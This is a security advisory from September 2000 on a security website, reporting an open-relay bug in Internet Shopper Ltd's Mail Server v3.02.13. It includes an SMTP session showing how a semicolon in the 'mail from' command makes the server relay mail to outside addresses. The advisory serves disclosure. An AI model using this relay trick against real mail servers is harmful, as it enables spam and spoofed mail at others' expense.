[ advisories | exploits | discussions | news | conventions | security tools | texts & papers ]
 main menu
- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news
- read forum
- new topic
- search

- meetings list
- recent additions
- add your info
 top 100 sites
- visit top sites
- sign up now
- members

- add your url
- add domain
- search box
- link to us

- our projects
- free email
 m4d network
- security software
- secureroot
- m4d.com
Home : Advisories : Internet Shopper Ltd's Mail Server Open relay bug

Title: Internet Shopper Ltd's Mail Server Open relay bug
Released by: Imran Ghory
Date: 18th September 2000
Printable version: Click here
Internet Shopper Ltd's Mail Server Open relay bug.

(I have been unable to make contact with Internet Shopper Ltd, and

as this bug might easily be found accidently I have decide to make

it public)


Internet Shopper Ltd's Mail Server can be made to accept and

handle mail for non-local sites.


Version involved:

Internet Shopper Ltd's Mail Server v3.02.13

No other versions have been tested.


The use of the semi-colon in the "mail from" command will allow

mail to be sent to machine that aren't local.

Exploit in action:

220 mailsvr.xxxxxxxxxx.ac.uk WindowsNT SMTP Server

v3.02.13/32.aap3 ready at Wed, 13 Sep 2000 21:03:39 +0100

helo me

250 mailsvr.xxxxxxxxxx.ac.uk me

mail from;

250 Ok.

rcpt to: ImranG@btinternet.com

250 Ok.


354 Start mail input, end with ..

Test data


250 Requested mail action Ok.


221 Goodbye me


None known at this time.

Imran Ghory

(C) 1999-2000 All rights reserved.